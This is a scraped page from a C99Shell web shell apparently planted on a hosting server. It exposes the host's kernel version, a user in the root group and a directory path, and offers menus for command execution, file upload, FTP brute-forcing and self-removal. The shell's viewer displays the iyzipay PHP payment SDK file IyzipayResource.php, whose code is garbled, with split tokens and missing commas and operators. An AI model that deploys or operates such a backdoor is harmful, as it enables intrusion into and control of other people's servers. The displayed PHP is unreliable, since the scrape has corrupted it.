!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/iyzico/iyzipay-php/src/Iyzipay/   drwxr-xr-x
Free 28.56 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     IyzipayResource.php (3.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Iyzipay;

class 
IyzipayResource extends ApiResource
{
    private 
$status;
    private 
$errorCode;
    private 
$errorMessage;
    private 
$errorGroup;
    private 
$locale;
    private 
$systemTime;
    private 
$conversationId;

    protected static function 
getHttpHeaders(Request $requestOptions $options)
    {
        
$header = array(
            
"Accept: application/json",
            
"Content-type: application/json",
        );

        
$rnd uniqid();
        
array_push($header"Authorization: " self::prepareAuthorizationString($request$options$rnd));
        
array_push($header"x-iyzi-rnd: " $rnd);
        
array_push($header"x-iyzi-client-version: " "iyzipay-php-2.0.54");

        return 
$header;
    }

    protected static function 
getHttpHeadersV2($uriRequest $request nullOptions $options)
    {
        
$header = array(
            
"Accept: application/json",
            
"Content-type: application/json",
        );

        
$rnd uniqid();
        
array_push($header"Authorization: " self::prepareAuthorizationStringV2($uri$request$options$rnd));
        
array_push($header"x-iyzi-client-version: " "iyzipay-php-2.0.43");

        return 
$header;
    }

    protected static function 
prepareAuthorizationString(Request $requestOptions $options$rnd)
    {
        
$authContent HashGenerator::generateHash($options->getApiKey(), $options->getSecretKey(), $rnd$request);
        return 
vsprintf("IYZWS %s:%s", array($options->getApiKey(), $authContent));
    }

    protected static function 
prepareAuthorizationStringV2($uriRequest $request nullOptions $options$rnd)
    {
        
$hash IyziAuthV2Generator::generateAuthContent($uri$options->getApiKey(), $options->getSecretKey(), $rnd$request);

        return 
'IYZWSv2'.' '.$hash;
    }

    public function 
getStatus()
    {
        return 
$this->status;
    }

    public function 
setStatus($status)
    {
        
$this->status $status;
    }

    public function 
getErrorCode()
    {
        return 
$this->errorCode;
    }

    public function 
setErrorCode($errorCode)
    {
        
$this->errorCode $errorCode;
    }

    public function 
getErrorMessage()
    {
        return 
$this->errorMessage;
    }

    public function 
setErrorMessage($errorMessage)
    {
        
$this->errorMessage $errorMessage;
    }

    public function 
getErrorGroup()
    {
        return 
$this->errorGroup;
    }

    public function 
setErrorGroup($errorGroup)
    {
        
$this->errorGroup $errorGroup;
    }

    public function 
getLocale()
    {
        return 
$this->locale;
    }

    public function 
setLocale($locale)
    {
        
$this->locale $locale;
    }

    public function 
getSystemTime()
    {
        return 
$this->systemTime;
    }

    public function 
setSystemTime($systemTime)
    {
        
$this->systemTime $systemTime;
    }

    public function 
getConversationId()
    {
        return 
$this->conversationId;
    }

    public function 
setConversationId($conversationId)
    {
        
$this->conversationId $conversationId;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--